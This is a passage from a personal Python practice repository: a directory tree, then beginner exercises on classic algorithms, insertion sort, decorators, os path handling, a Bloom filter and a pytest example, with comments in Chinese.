├── README.md ├── algorithms ├── others │ └── base_algorithm_que.py ├── sorted │ └── sorted_algorithms.py └── test.py ├── basics ├── decorator.py ├── os.py ├── test_bloomfilter.py ├── test_test_demo.py └── zlib.py ├── blockchains ├── blockchain.py ├── blockchain_node1.py ├── blockchain_node2.py ├── 待解决问题.txt └── 模拟挖矿过程.txt ├── data_process ├── db_operation.py ├── divide_words.py ├── pandas_operation.py └── word_cloud.py ├── interesting ├── __init__.py ├── apscheduler │ ├── a.ico │ └── testApscheduler.py ├── dingding_push │ ├── __init__.py │ ├── demo.py │ └── dingding_push_msg.py └── hongzha.py ├── other_files └── chromedriver │ └── chromedriver.exe ├── practice ├── __init__.py ├── leetcode │ ├── 237.py │ ├── 709.py │ ├── 771.py │ ├── 832.py │ └── 977.py └── technique │ ├── __init__.py │ ├── code_technique.py │ ├── config │ ├── __init__.py │ ├── ip_pool.txt │ ├── random_ip.py │ ├── test_comfig.py │ └── user_agent.py │ ├── db_operate.py │ ├── excel_operate.py │ ├── file_operate.py │ ├── pdf_operate.py │ ├── selenium_template.py │ ├── test_data │ ├── test.py │ └── test_excel.xlsx │ ├── word_operate.py │ └── zip_file_operate.py ├── project_directory_structure.txt └── spider ├── __init__.py ├── config ├── __init__.py ├── ipPool.txt ├── random_ip.py ├── test_comfig.py └── user_agent.py ├── configure ├── __init__.py ├── ipPool.txt ├── log.py ├── randomIp.py └── test.py ├── coroutine.py ├── down_doc_png.py ├── down_video ├── down_film.py ├── 参考.txt ├── 查看.ts文件.png └── 查看m3u8文件.png ├── ebook └── down_history_books.py ├── get_heml.py ├── get_html_new.py ├── get_meizi_image.py ├── get_url_data.py ├── gzh ├── GZH.py └── ip_pool.txt ├── kcb_info.py ├── movieReview ├── cleanData.py ├── cleanData.txt ├── film.py ├── filmComments.py ├── ipPool.txt ├── stopWords.txt ├── temp.txt ├── temp2.txt ├── test.csv └── test2.csv ├── news ├── __init__.py ├── get_news_url.py ├── new_pengpai.py ├── new_url.txt ├── re.txt └── wallstreetcn.py ├── pachong ├── geckodriver.log ├── get_dynamic_data.py ├── page_source.txt ├── result.csv ├── screenshot │ ├── 1.png │ └── bottom.jpg └── 笔记.txt ├── spider.zip ├── wechat ├── __init__.py ├── get_wechat_data_old.py └── get_wechat_data_simple.py └── weibo ├── __init__.py └── weibo_api.py /README.md: -------------------------------------------------------------------------------- 1 | # Python 2 | Python Related Work 3 | 1. algorithms 算法 4 | 2. basics 基础 5 | 3. blockchains 区块链 6 | 4. data_process 数据处理 7 | 5. practice 练习 8 | technique 9 | db_operation 数据库相关 10 | code_technique 代码技巧 11 | doc_operate 常规文件操作 12 | pdf_operate pdf操作 13 | word_operate word操作 14 | 6. spider 爬虫 15 | gzh 公众号 16 | wechat_data 微信数据 17 | config 爬虫一般配置 18 | down_video 下载视频 19 | get_news 下载新闻 20 | movie_review 爬取影评 21 | pachong 爬取直播 22 | weibo 测试微博 23 | 7. interesting 有趣内容 24 | apscheduler 定时器相关 25 | 8. otherfiles 其他 26 | -------------------------------------------------------------------------------- /algorithms/others/base_algorithm_que.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 基本经典算法 6 | 1. 菲波拉契数列问题 7 | 2. 判断素数问题 8 | 3. 判断水仙花数问题 9 | 4. 获取分数评级(嵌套条件运算符) 10 | 5. 正整数分解质因数 11 | 6. 最大公约数和最小公倍数 12 | 7. 统计字符串内容 13 | 8. 计算特殊表达式的和 求s=a+aa+aaa+aaaa+aa…a的值 14 | 9. 判断一个数是否是完数(一个数如果恰好等于它的因子之和,如6=1+2+3) 15 | 10.阶乘 求1+2!+3!+…+20!的和 16 | 11.判断回文数 17 | 12.四数取三,排列组合 18 | -------------------------------- 19 | @Time : 2018/11/26 20:30 20 | @File : base_algorithm_que.py 21 | @Software: PyCharm 22 | -------------------------------- 23 | @Author : lixj 24 | @contact : lixj_zj@163.com 25 | """ 26 | 27 | import math 28 | 29 | 30 | ######### 1. 菲波拉契数列问题 ######### 31 | class fibonacci(object): 32 | def __init__(self, num): 33 | self.num = num 34 | 35 | # 建立数组---空间复杂度高 36 | def getFibonacciList_three(self): 37 | result = [] 38 | result.insert(0, 1) 39 | result.insert(1, 1) 40 | for i in range(2, self.num): 41 | result.insert(i, result[i - 1] + result[i - 2]) 42 | print(result) 43 | 44 | # 直接打印---从下往上计算 时间复杂度O(n) 45 | def getFibonacciList_two(self): 46 | one, two = 1, 1 47 | print(one, two, end="\t") 48 | for i in range(2, self.num): 49 | three = one + two 50 | one, two = two, three 51 | print(three, end="\t") 52 | 53 | 54 | # 递归--时间复杂度高 55 | def getFibonacciList_one(num): 56 | if num in [0, 1]: 57 | return 1 58 | else: 59 | return getFibonacciList_one(num - 1) + getFibonacciList_one(num - 2) 60 | 61 | 62 | ######### 2. 判断素数问题 ######### 63 | def isPrime(num): 64 | flag = True 65 | for i in range(2, int(math.sqrt(num) + 1)): # <=, +1表示判断math.sqrt(num)这个数是否为素数 66 | if num % i == 0: 67 | flag = False 68 | break 69 | return flag 70 | 71 | 72 | ######### 3. 判断水仙花数 ######### 73 | def getDaffodil(): 74 | beginNum = 101 75 | endNum = 1000 76 | for i in range(beginNum, endNum): 77 | a = int(i % 10) # int()取整数,否则计算浮点数 78 | b = int(i / 10 % 10) 79 | c = int(i / 100) 80 | if a ** 3 + b ** 3 + c ** 3 == i: 81 | print(i) 82 | 83 | 84 | ######### 4. 获取分数评级(嵌套条件运算符)######### 85 | def getScoreSign(score): 86 | return "A" if score >= 90 else "B" if score >= 60 else "C" 87 | 88 | 89 | ######### 5. 正整数分解质因数 ######### 90 | def getPrimeNum(num): 91 | n = 2 92 | result = [] 93 | while num >= n: 94 | if num == n: 95 | result.append(num) # !找到最终的,也是最大的质因数 96 | break # 退出循环 97 | elif num % n == 0: # 说明此时的num可以再次被分解 98 | result.append(n) # !每次被n整除时,n均作为质因数,而不是num 99 | num = int(num / n) # !每次取整数 100 | else: 101 | n += 1 # !n自增找到最大质因数本身。例如:7 102 | return result 103 | 104 | 105 | ######### 6. 最大公约数和最小公倍数 ######### 106 | # /*在循环中,只要除数不等于0,用较大数除以较小的数, 107 | # 若两数相同,最大公约数为本身; 108 | # 将小的一个数作为下一轮循环的大数,取得的余数作为下一轮循环的较小的数, 109 | # 如此循环直到较小的数的值为0, 110 | # 返回较大的数,此数即为最大公约数,最小公倍数为两数之积除以最大公约数。 / 111 | def getMaxComDivisorAndMinComMultiple(num_one, num_two): 112 | # 判断大小数-设置num_two为大数 113 | if num_one > num_two: 114 | num_two, num_one = num_one, num_two 115 | while num_one != 0: 116 | if num_one == num_two: # !循环出口条件 两数相同,最大公约数为本身 117 | return num_two 118 | temp = num_one 119 | num_one = int(num_two % num_one) # !余数肯定比被除数小,将余数设为小的数 120 | num_two = temp 121 | return num_two 122 | 123 | 124 | ######### 7. 统计字符串内容 ######### 125 | # 输入一行字符,分别统计出其中 中文、英文字母、空格、数字和其它字符的个数 126 | def countNum(string): 127 | result = [0, 0, 0, 0, 0] 128 | for char in string: 129 | if u'\u4e00' <= char <= u'\u9fa5': # 判断是否是汉字,在isalpha()方法之前判断 130 | result[0] += 1 131 | elif char.isalpha(): # !汉字也返回true 132 | result[1] += 1 133 | elif char.isspace(): 134 | result[2] += 1 135 | elif char.isdigit(): 136 | result[3] += 1 137 | else: 138 | result[4] += 1 139 | return result 140 | 141 | 142 | ######### 8. 计算特殊表达式的和 求s=a+aa+aaa+aaaa+aa…a的值 ######### 143 | def getNumSum(num, count): 144 | sum = 0 145 | result = 0 146 | for i in range(count): 147 | sum += num * 10 ** i 148 | result += sum 149 | print(result) 150 | return result 151 | 152 | 153 | ######### 9. 判断一个数是否是完数(一个数如果恰好等于它的因子之和,如6=1+2+3) ######### 154 | def isCompleteNum(num): 155 | sum = 0 156 | for i in range(1, int(num / 2) + 1): 157 | if num % i == 0: 158 | sum += i 159 | return True if sum == num else False 160 | 161 | 162 | ######### 10. 求1+2!+3!+…+20!的和 ######### 163 | def factorial(num): 164 | sum = 0 165 | temp = 1 166 | for one_num in range(1, num + 1): 167 | temp *= one_num 168 | sum += temp 169 | return sum 170 | 171 | 172 | def factorial_two(num): 173 | from functools import reduce 174 | sum = 0 175 | for i in range(2, num + 2): # 从2开始,num+2结束 176 | sum += reduce(lambda x, y: x * y, range(1, i)) # reduce() 累积 177 | print(sum) 178 | 179 | 180 | ######### 11. 判断一个数是否为回文数 ######### 181 | def isNumberOfTracts(num): 182 | if num < 0 or (num % 10 == 0 and num != 0): 183 | return False 184 | str1 = str(num) 185 | str2 = str(num)[::-1] # 列表反转 186 | for i in range(len(str1)): 187 | if str1[i] != str2[i]: 188 | print(str1[i], str2[i], " error index is:", i) 189 | return False 190 | else: 191 | return True 192 | 193 | 194 | ######### 12. 四数取三,排列组合 ######### 195 | # 有1、2、3、4四个数字,能组成多少个互不相同且一个数字中无重复数字的三位数。不涉及0 196 | # 字符串涉及重复内容。set()去重。 197 | def permutations(num): 198 | count = 0 199 | for i in range(1, num + 1): 200 | for j in range(1, num + 1): 201 | for k in range(1, num + 1): 202 | if ((i != j) and (j != k) and (i != k)): 203 | count += 1 204 | print(i * 100 + j * 10 + k, i, j, k) 205 | print(count) 206 | 207 | 208 | # itertools.combinations()组合;itertools.permutations()排列,列出所有可能性 209 | def permutations_one(tar, num): 210 | ''' 211 | :param tar: 待排列或组合的目标 212 | :param num: 选取个数 213 | :return: 排列或组合的结果 214 | ''' 215 | import itertools 216 | permutations = itertools.permutations(str(tar), num) 217 | result = [] 218 | for permutation in list(permutations): 219 | sum = "" 220 | for char in permutation: 221 | sum += str(char) 222 | if tar.__class__ is int: 223 | result.append(int(sum)) 224 | else: 225 | result.append(sum) 226 | print(result) 227 | 228 | 229 | if __name__ == '__main__': 230 | print(isNumberOfTracts(10)) 231 | pass 232 | 233 | """ 234 | ######### 1. 菲波拉契数列问题 ######### 235 | num = 10 236 | fibonacci = fibonacci(num) 237 | for i in range(num): 238 | print(getFibonacciList_one(i), end="\t") 239 | fibonacci.getFibonacciList_two() 240 | fibonacci.getFibonacciList_three() 241 | 242 | ######### 2. isPrime ######### 243 | beginNum, endNum = 101, 200 244 | count = 0 245 | for i in range(beginNum, endNum): 246 | if isPrime(i): 247 | count += 1 248 | print(i, end=" ") 249 | print("总数:", count) 250 | 251 | ######### 3. 判断水仙花数 ######### 252 | getDaffodil() 253 | 254 | ######### 4. 获取分数评级(嵌套条件运算符-python无三目运算) ######### 255 | score = 60 256 | getScoreSign(score) 257 | 258 | ######### 5. 正整数分解质因数 ######### 259 | num = 12 260 | getPrimeNum(num) 261 | 262 | ######### 6. 最大公约数和最小公倍数 ######### 263 | maxComDivisor = getMaxComDivisorAndMinComMultiple(200, 12) 264 | minComMultiple = int(200 * 12 / maxComDivisor) 265 | print(maxComDivisor, minComMultiple) 266 | 267 | ######### 7. 统计字符串内容 ######### 268 | countNum("123test 哈哈 #@*") 269 | 270 | ######### 8. 计算特殊表达式的和 求s=a+aa+aaa+aaaa+aa…a的值 ######### 271 | getNumSum(num=3, count=6) 272 | 273 | ######### 9. 判断一个数是否是完数(一个数如果恰好等于它的因子之和,如6=1+2+3) ######### 274 | isCompleteNum(num=6) 275 | 276 | ######### 10. 求1+2!+3!+…+20!的和 ######### 277 | factorial(20) 278 | 279 | ######### 11. 判断回文数 ######### 280 | isNumberOfTracts(12345687654321) 281 | 282 | ######### 12. 四数取三,排列组合 ######### 283 | permutations(4) 284 | permutations_one(1230, 3) 285 | """ 286 | -------------------------------------------------------------------------------- /algorithms/sorted/sorted_algorithms.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 排序算法集合 6 | 1. 插入排序 7 | 2. 8 | 3. 9 | 4. 10 | -------------------------------- 11 | @Time : 2019/7/30 21:51 12 | @File : sorted_algorithms.py 13 | @Software: PyCharm 14 | -------------------------------- 15 | @Author : lixj 16 | @contact : lixj_zj@163.com 17 | """ 18 | 19 | 20 | class SortedAlgorithms(object): 21 | def __init__(self): 22 | pass 23 | 24 | def straight_insertion_sort(self, ints): 25 | """ 26 | 直接插入排序 27 | 介绍: 28 | 一种依次将无序区的元素在有序区内找到合适位置依次插入的算法 29 | 基本思想: 30 | 每次从无序表中取出第一个元素,把它插入到有序表的合适位置,使有序表仍然有序,直到无序表内所有元素插入为止 31 | 评价: 32 | 插入排序的最坏时间复杂度为 O(n^2),属于稳定排序算法,对于处理小批量数据时高效; 33 | :return: 排序后列表 34 | """ 35 | for key, value in enumerate(ints): 36 | # 获取当前值 37 | current = value 38 | # 获取当前项前一项 39 | j = key - 1 40 | # 若前一项的 key >= 0 并且 前一项的值大于当前值 41 | while j >= 0 and ints[j] > current: 42 | # 将前一项的值赋给当前值,即大的值赋给小的值,小的值此时存储为 current 43 | ints[j + 1] = ints[j] 44 | # 继续前移一位 45 | j = j - 1 46 | # 将当前值(比较后的最小值)赋给当前项 47 | ints[j + 1] = current 48 | return ints 49 | 50 | def straight_insertion_sort_optimization(self): 51 | """ 52 | 直接插入排序算法优化--折半查找 53 | :return: 54 | """ 55 | pass 56 | 57 | 58 | if __name__ == '__main__': 59 | ints = [1, 5, 3, 8, 1, 9, 4, 7, 2] 60 | algorithms = SortedAlgorithms() 61 | 62 | # 直接插入排序 63 | print(algorithms.straight_insertion_sort(ints)) 64 | -------------------------------------------------------------------------------- /algorithms/test.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2020/4/15 23:47 8 | @File : test.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | a = [1,2,3,4,5] 16 | print(a[-4:-2]) 17 | -------------------------------------------------------------------------------- /basics/decorator.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 装饰器常见用法 6 | 参考网址:https://mp.weixin.qq.com/s/8z92pbhJV1ybfE6YZfvOuw?scene=25#wechat_redirect 7 | -------------------------------- 8 | @Time : 2019/8/14 14:10 9 | @File : decorator.py 10 | @Software: PyCharm 11 | -------------------------------- 12 | @Author : lixj 13 | @contact : lixj_zj@163.com 14 | """ 15 | 16 | import time 17 | 18 | 19 | ## 1. 简单 demo 20 | def decorator(func): 21 | """ 22 | 定义装饰器。调用含有该装饰器的函数时,先将这个函数做为参数传入该装饰器。 23 | :param func: 含有该装饰器的函数 24 | :return: 25 | """ 26 | 27 | def wrapper(*args, **kwargs): 28 | return func() 29 | 30 | return wrapper 31 | 32 | 33 | @decorator 34 | def function(): 35 | print("hello decorator") 36 | 37 | 38 | ## 2. 日志打印装饰器 39 | def logger(func): 40 | def wrapper(*args, **kwargs): 41 | print("开始执行:{}函数".format(func.__name__)) 42 | # 真正执行 43 | func(*args, **kwargs) 44 | print("执行:{}函数完毕".format(func.__name__)) 45 | 46 | return wrapper 47 | 48 | 49 | @logger 50 | def add(x, y): 51 | print("{}+{}={}".format(x, y, x + y)) 52 | 53 | 54 | ## 3. 时间计时器 55 | def timer(func): 56 | def wrapper(*args, **kwargs): 57 | begin_time = time.time() 58 | # 执行函数 59 | func(*args, **kwargs) 60 | cost_time = time.time() - begin_time 61 | print("程序耗时:{}秒".format(cost_time)) 62 | 63 | return wrapper 64 | 65 | 66 | @timer 67 | def test_timer_sleep(sleep_time): 68 | time.sleep(sleep_time) 69 | 70 | 71 | ## 4. 带参数的函数装饰器--两层嵌套 72 | def say_hello(contry): 73 | def wrapper(func): 74 | def deco(*args, **kwargs): 75 | if contry == "china": 76 | print("你好!") 77 | elif contry == "america": 78 | print("hello.") 79 | else: 80 | return 81 | # 真正执行函数 82 | func(*args, **kwargs) 83 | 84 | return deco 85 | 86 | return wrapper 87 | 88 | 89 | @say_hello("china") 90 | def xiaoming(): 91 | pass 92 | 93 | 94 | @say_hello("america") 95 | def jack(): 96 | pass 97 | 98 | 99 | ## 5. 高阶:不带参数的类装饰器 100 | # 基于类装饰器的实现,必须实现 __call__ 和 __init__两个内置函数。 101 | # __init__ :接收被装饰函数 102 | # __call__ :实现装饰逻辑。 103 | class Logger(object): 104 | def __init__(self, func): 105 | # 接收被装饰函数 106 | self.func = func 107 | 108 | def __call__(self, *args, **kwargs): 109 | # 实现装饰逻辑 110 | print("[INFO]: the function {}() is running...".format(self.func.__name__)) 111 | # 真正执行函数 112 | return self.func(*args, **kwargs) 113 | 114 | 115 | @Logger 116 | def say_no_parameter(something): 117 | print("say {}!".format(something)) 118 | 119 | 120 | ## 6.高阶:带参数的类装饰器 121 | # 带参数和不带参数的类装饰器有很大的不同。 122 | # __init__ :不再接收被装饰函数,而是接收传入参数。 123 | # __call__ :接收被装饰函数,实现装饰逻辑。 124 | class Logger(object): 125 | def __init__(self, level='INFO'): 126 | # 接收参数 127 | self.level = level 128 | 129 | def __call__(self, func): 130 | def wrapper(*args, **kwargs): 131 | # 实现装饰逻辑 132 | print("[{}]: the function {}() is running...".format(self.level, func.__name__)) 133 | # 接收被装饰函数,执行函数 134 | func(*args, **kwargs) 135 | 136 | # 返回函数 137 | return wrapper 138 | 139 | 140 | @Logger(level='WARNNING') 141 | def say_with_parameter(something): 142 | print("say {}!".format(something)) 143 | 144 | 145 | ## 7. 使用偏函数与类实现装饰器 146 | # Python 对某个对象是否能通过装饰器( @decorator)形式使用只有一个要求: 147 | # decorator 必须是一个 “可被调用” (callable)的对象。 148 | # 对于这个 callable 对象,我们最熟悉的就是函数了。 149 | # 除函数之外,类也可以是 callable 对象,只要实现了__call__ 函数(上面几个例子已经接触过了)。 150 | # 还有容易被人忽略的偏函数其实也是 callable 对象。 151 | import time 152 | import functools 153 | 154 | 155 | class DelayFunc: 156 | def __init__(self, duration, func): 157 | self.duration = duration 158 | self.func = func # @delay(duration=2) 装饰器修饰的 add_partial() 函数 159 | 160 | def __call__(self, *args, **kwargs): 161 | print(f'Wait for {self.duration} seconds...') 162 | time.sleep(self.duration) 163 | return self.func(*args, **kwargs) 164 | 165 | 166 | def delay(duration): 167 | """ 168 | 装饰器:推迟某个函数的执行。 169 | :param duration: 延迟时间 170 | :return: 执行结果 171 | """ 172 | # 此处为了避免定义额外函数,直接使用 functools.partial 帮助构造 DelayFunc 实例 173 | return functools.partial(DelayFunc, duration) 174 | 175 | 176 | # duration=2,延迟2秒 177 | @delay(duration=2) 178 | def add_partial(a, b): 179 | return a + b 180 | 181 | 182 | ## 8. 如何写能装饰类的装饰器? 183 | # 单例模式---装饰器实现控制生成类实例 184 | # 可以看到我们用 singleton 这个装饰函数来装饰 User 这个类。 185 | # 装饰器用在类上,并不是很常见,但只要熟悉装饰器的实现过程,就不难以实现对类的装饰。 186 | 187 | # 类的实例字典,key: 实例名称,value: 实例 object 188 | instances = {} 189 | 190 | 191 | def singleton(cls): 192 | """ 193 | 单例模式生成类 194 | :param cls: singleton 装饰器修饰的类 195 | :return: 196 | """ 197 | 198 | def get_instance(*args, **kw): 199 | cls_name = cls.__name__ 200 | if not cls_name in instances: 201 | # 生成装饰器修饰的类的实例 202 | instance = cls(*args, **kw) 203 | # 将实例加到字典中。key: cls_name,value: instance 204 | instances[cls_name] = instance 205 | # 返回该类的实例 206 | return instances[cls_name] 207 | 208 | return get_instance 209 | 210 | 211 | @singleton 212 | class User: 213 | def __init__(self, name): 214 | self.name = name 215 | 216 | 217 | ## 9. wraps 装饰器 218 | # functools 标准库中有提供一个 wraps 装饰器 219 | # 作用就是将 被修饰的函数(wrapped) 的一些属性值赋值给 修饰器函数(wrapper) ,最终让属性的显示更符合我们的直觉。 220 | # 准确点说,wraps 其实是一个偏函数对象(partial) 221 | from functools import update_wrapper 222 | 223 | WRAPPER_ASSIGNMENTS = ('__module__', '__name__', '__qualname__', '__doc__', 224 | '__annotations__') 225 | 226 | 227 | def wrapper(func): 228 | def inner_function(): 229 | pass 230 | 231 | update_wrapper(inner_function, func, assigned=WRAPPER_ASSIGNMENTS) 232 | return inner_function 233 | 234 | 235 | @wrapper 236 | def wrapped(): 237 | pass 238 | 239 | 240 | print(wrapped.__name__) # wrapped 241 | 242 | 243 | ## 10. 内置装饰器:property 244 | # 内建装饰器,它通常存在于类中,可以将一个函数定义成一个属性,属性的值就是该函数return的内容。 245 | # 用@property装饰过的函数,会将一个函数定义成一个属性,属性的值就是该函数return的内容。同时,会将这个函数变成另外一个装饰器。 246 | # property 的底层实现机制是「描述符」 247 | class TestProperty(object): 248 | 249 | def __init__(self, fget=None, fset=None, fdel=None, doc=None): 250 | self.fget = fget 251 | self.fset = fset 252 | self.fdel = fdel 253 | self.__doc__ = doc 254 | 255 | def __get__(self, obj, objtype=None): 256 | print("in __get__") 257 | if obj is None: 258 | return self 259 | if self.fget is None: 260 | raise AttributeError 261 | return self.fget(obj) 262 | 263 | def __set__(self, obj, value): 264 | print("in __set__") 265 | if self.fset is None: 266 | raise AttributeError 267 | self.fset(obj, value) 268 | 269 | def __delete__(self, obj): 270 | print("in __delete__") 271 | if self.fdel is None: 272 | raise AttributeError 273 | self.fdel(obj) 274 | 275 | def getter(self, fget): 276 | print("in getter") 277 | return type(self)(fget, self.fset, self.fdel, self.__doc__) 278 | 279 | def setter(self, fset): 280 | print("in setter") 281 | return type(self)(self.fget, fset, self.fdel, self.__doc__) 282 | 283 | def deleter(self, fdel): 284 | print("in deleter") 285 | return type(self)(self.fget, self.fset, fdel, self.__doc__) 286 | 287 | 288 | class Student: 289 | def __init__(self, name): 290 | self.name = name 291 | 292 | # 其实只有这里改变 293 | @TestProperty 294 | def math(self): 295 | return self._math 296 | 297 | @math.setter 298 | def math(self, value): 299 | if 0 <= value <= 100: 300 | self._math = value 301 | else: 302 | raise ValueError("Valid value must be in [0, 100]") 303 | 304 | 305 | # 说明: 306 | # 1. 使用TestProperty装饰后,math 不再是一个函数,而是TestProperty类的一个实例。 307 | # 所以第二个math函数可以使用 math.setter 来装饰,本质是调用TestProperty.setter 来产生一个新的 TestProperty 实例赋值给第二个math。 308 | # 2. 第一个 math 和第二个 math 是两个不同 TestProperty 实例。但他们都属于同一个描述符类(TestProperty), 309 | # 当对 math 对于赋值时,就会进入 TestProperty.__set__, 310 | # 当对 math 进行取值里,就会进入 TestProperty.__get__。 311 | # 仔细一看,其实最终访问的还是 Student 实例的 _math 属性。 312 | 313 | 314 | # 运行后,会直接打印这一行,这是在实例化 TestProperty 并赋值给第二个math 315 | # in setter 316 | # >>> 317 | # >>> s1.math = 90 318 | # in __set__ 319 | # >>> s1.math 320 | # in __get__ 321 | # 90 322 | 323 | 324 | ## 11. 其他装饰器:装饰器实战 325 | # 一个实现控制函数运行超时的装饰器。如果超时,则会抛出超时异常。 326 | import signal 327 | 328 | 329 | class TimeoutException(Exception): 330 | def __init__(self, error='Timeout waiting for response from Cloud'): 331 | Exception.__init__(self, error) 332 | 333 | 334 | def timeout_limit(timeout_time): 335 | def wraps(func): 336 | def handler(signum, frame): 337 | raise TimeoutException() 338 | 339 | def deco(*args, **kwargs): 340 | signal.signal(signal.SIGALRM, handler) 341 | signal.alarm(timeout_time) 342 | func(*args, **kwargs) 343 | signal.alarm(0) 344 | 345 | return deco 346 | 347 | return wraps 348 | 349 | 350 | if __name__ == '__main__': 351 | # function() 352 | # add(1, 2) 353 | # test_timer_sleep(3) 354 | 355 | # xiaoming() 356 | # jack() 357 | 358 | # say_no_parameter("123") 359 | # say_with_parameter("456") 360 | 361 | ## 7. 偏函数 362 | # add_partial(1, 2) 363 | # >>> add_partial # 可见 add 变成了 Delay 的实例 364 | # <__main__.DelayFunc object at 0x107bd0be0> 365 | # 366 | # >>> add_partial(3,5) # 直接调用实例,进入 __call__ 367 | # Wait for 2 seconds... 368 | # 8 369 | # 370 | # >>> add_partial.func # 实现实例方法 371 | # 372 | 373 | ## 8. 单例模式 374 | # user_one = User("tony") 375 | # print(user_one) 376 | 377 | ## 9. wraps 装饰器 378 | # wrapped() 379 | 380 | ## 10. 内置装饰器:property 381 | pass 382 | -------------------------------------------------------------------------------- /basics/os.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/5/26 10:12 8 | @File : os.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import os 16 | import shutil 17 | 18 | current_path = "D:\ZX_workspace\Python\Basics\osRelated.py" 19 | 20 | # 1.获取当前文件绝对路径 21 | print(os.path.abspath(__file__)) 22 | print(os.path.abspath("osRelated1.py")) 23 | 24 | # 2.获取当前文件夹绝对路径 25 | print(os.path.dirname(__file__)) 26 | print(os.path.dirname(os.path.abspath(__file__))) 27 | # os.path.sep为 \\ 28 | print(os.path.abspath(os.path.dirname(__file__) + os.path.sep + ".")) 29 | print(os.path.abspath(os.path.dirname(current_path) + os.path.sep + ".")) 30 | 31 | # 3.切换目录 参数为目录路径,非文件路径 32 | print(os.chdir(os.path.dirname(current_path))) 33 | 34 | # 4.拼接路径与文件 35 | print(os.path.join(os.path.abspath(os.path.dirname(__file__)), "aa.txt")) 36 | 37 | # 5. . .. \\ ; 等标记在ntpath.py中已经封装 38 | print(os.path.pardir) 39 | 40 | # 6. 41 | print(os.getcwd()) 42 | 43 | # 7.返回指定目录下的所有文件和目录名 44 | print(os.listdir(os.path.dirname(current_path))) 45 | 46 | -------------------------------------------------------------------------------- /basics/test_bloomfilter.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 布隆过滤器 6 | -------------------------------- 7 | @Time : 2019/9/6 17:16 8 | @File : test_bloomfilter.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import mmh3 16 | from bitarray import bitarray 17 | 18 | 19 | class BloomFilter(object): 20 | 21 | def __init__(self, bit_size): 22 | # 位向量大小 23 | self.bit_size = bit_size 24 | # 构建位向量 25 | self.bit_array = bitarray(bit_size) 26 | # 位向量初始化,全部设置为0 27 | self.bit_array.setall(0) 28 | 29 | def add_data(self, url): 30 | """ 31 | 往布隆过滤器中添加数据,同时将其hash成bitarray,将位向量中与结果集对应的位置至1 32 | :param url: 添加的 URL 33 | """ 34 | position_list = self.get_positions(url) 35 | for position in position_list: 36 | self.bit_array[position] = 1 37 | 38 | def is_contained(self, url): 39 | """ 40 | 校验布隆过滤器中是否包含某个url 41 | :param url: 目标URL 42 | """ 43 | # 获取目标URL对应的多个hash值在位向量中的位置集 44 | position_list = self.get_positions(url) 45 | result = True 46 | # 判断每个位置是否已经被至1 47 | for position in position_list: 48 | result = result and self.bit_array[position] 49 | return result 50 | 51 | def get_positions(self, url): 52 | """ 53 | 返回url经过hash之后的位向量。此处采用三个hash函数构建。 54 | 取余数,保证向量组的比特位索引小于bit_size 55 | :param url: 需要经过hash的数据 56 | :return: url所在位向量的位置 57 | """ 58 | # hash(key, seed=0, signed=True) 59 | # 参数解释: 60 | # key: 需要hash的元素 61 | # seed: 种子参数,随机化函数的一种方法。采用不同的种子参数,生成不同的hash值,防止不同数据的hash冲突 62 | # signed: 默认True 63 | # seed 参数解释参考:https://stackoverflow.com/questions/9241230/what-is-murmurhash3-seed-parameter 64 | position_one = mmh3.hash(url, 60) % self.bit_size 65 | position_two = mmh3.hash(url, 61) % self.bit_size 66 | position_three = mmh3.hash(url, 62) % self.bit_size 67 | return [position_one, position_two, position_three] 68 | 69 | if __name__ == '__main__': 70 | bloom = BloomFilter(100000) 71 | bloom.add_data('https://www.baidu.com') 72 | print(bloom.is_contained('https://www.baidu.com')) 73 | print(bloom.is_contained('test')) 74 | -------------------------------------------------------------------------------- /basics/test_test_demo.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : python 测试用例 6 | 主要使用 python 中的 pytest 框架,在 pycharm 配置搜索 pytest 配置 7 | -------------------------------- 8 | @Time : 2019/8/1 22:07 9 | @File : test_test_demo.py 10 | @Software: PyCharm 11 | -------------------------------- 12 | @Author : lixj 13 | @contact : lixj_zj@163.com 14 | """ 15 | 16 | import pytest 17 | from io import StringIO 18 | 19 | 20 | def count_vowels_v2(fp): 21 | """ 22 | 统计某个文件中,包含元音字母(aeiou)的数量(普通做法) 23 | :param fp: 24 | :return: 25 | """ 26 | VOWELS_LETTERS = {'a', 'e', 'i', 'o', 'u'} 27 | count = 0 28 | for line in fp: 29 | for char in line: 30 | if char.lower() in VOWELS_LETTERS: 31 | count += 1 32 | return count 33 | 34 | 35 | @pytest.mark.parametrize( 36 | "content, vowels_count", [ 37 | # 使用 pytest 提供的参数化测试工具,定义测试参数列表(构造测试用例) 38 | # (文件内容, 期待结果) 39 | ('', 0), 40 | ('Hello World!', 2), 41 | ('HELLO_WORLD!', 3), 42 | ('啊哈哈哈', 0), 43 | ] 44 | ) 45 | def test_demo(content, vowels_count): 46 | # 利用 StirngIO 构建类文件对象 file 47 | file = StringIO(content) 48 | assert count_vowels_v2(file) == vowels_count 49 | -------------------------------------------------------------------------------- /basics/zlib.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 压缩解压 6 | -------------------------------------- 7 | @File : zlib.py 8 | @Time : 